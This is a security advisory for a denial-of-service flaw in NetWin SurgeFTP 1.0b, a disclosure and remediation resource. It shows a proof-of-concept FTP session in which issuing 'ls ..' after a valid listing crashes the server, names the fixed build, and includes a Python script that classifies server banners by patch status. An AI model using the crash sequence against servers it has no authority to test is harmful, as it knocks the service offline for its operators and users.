SurgeFTP 1.0b Denial of Service

VERSION AFFECTED

  • NetWin’s SurgeFTP 1.0b

DESCRIPTION

A denial-of-service (DoS) condition exists in NetWin’s SurgeFTP 1.0b that lets any user with local access to the SurgeFTP host crash the server. A malformed request for a directory listing, such as “ls ..”, issued after a valid listing request has succeeded, might crash the server.

DEMONSTRATION

SNS Research provided the following proof-of-concept scenario:

# ftp localhost
Connected to testbak
220 SurgeFTP testbak (Version 1.0b)
User (testbak:(none)): anonymous
331 Password required for anonymous.
Password:
230- Alias      Real path       Access
230- /          /home           read
230 User anonymous logged in.
ftp> ls /
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/)
226 Transfer complete.
ftp> ls ..
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/..)
-> ftp get:Connection reset by peer

(..)

VENDOR RESPONSE

The vendor, NetWin, has released build v1.1h that corrects this issue. It is available at ftp://ftp.netwinsite.com/pub/surgeftp/surgeftp11h_nt.exe
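To find hosts that still need the vendor build, the greeting line shown in the session above can be checked against the versions named in this advisory. The following is an added example, not code from SNS Research or NetWin; the sample host names other than testbak are constructed, and it assumes that the fixed build announces itself as "Version 1.1h" and that builds sort by major, minor, then letter.

```python
import re

# Greeting format taken from the session on this page:
#   220 SurgeFTP testbak (Version 1.0b)
BANNER_RE = re.compile(
    r"^220[ -]SurgeFTP\s+(\S+)\s+\(Version\s+(\d+)\.(\d+)([a-z]?)\)", re.I
)

AFFECTED = (1, 0, "b")  # version named in the advisory
FIXED = (1, 1, "h")     # vendor build that corrects the issue


def parse_banner(line):
    """Return (host, (major, minor, letter)) or None if not a SurgeFTP greeting."""
    m = BANNER_RE.match(line.strip())
    if not m:
        return None
    host, major, minor, letter = m.groups()
    return host, (int(major), int(minor), letter.lower())


def classify(line):
    """Map a greeting line to 'affected', 'fixed', 'unknown' or 'not-surgeftp'."""
    parsed = parse_banner(line)
    if parsed is None:
        return "not-surgeftp"
    version = parsed[1]
    if version == AFFECTED:
        return "affected"
    # Assumption: builds order as (major, minor, letter) tuples.
    if version >= FIXED:
        return "fixed"
    # The advisory says nothing about other builds below 1.1h.
    return "unknown"


# Constructed inventory of captured greetings; only the first line is from the page.
SAMPLE_BANNERS = [
    "220 SurgeFTP testbak (Version 1.0b)",
    "220 SurgeFTP files01 (Version 1.1h)",
    "220 SurgeFTP files02 (Version 1.1c)",
    "220 FTP server ready.",
]

if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        print(f"{classify(banner):13} {banner}")
```

Hosts reported as "unknown" run a build the advisory does not mention and should be checked against the vendor's release notes.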

CREDIT

Discovered by SNS Research.

 
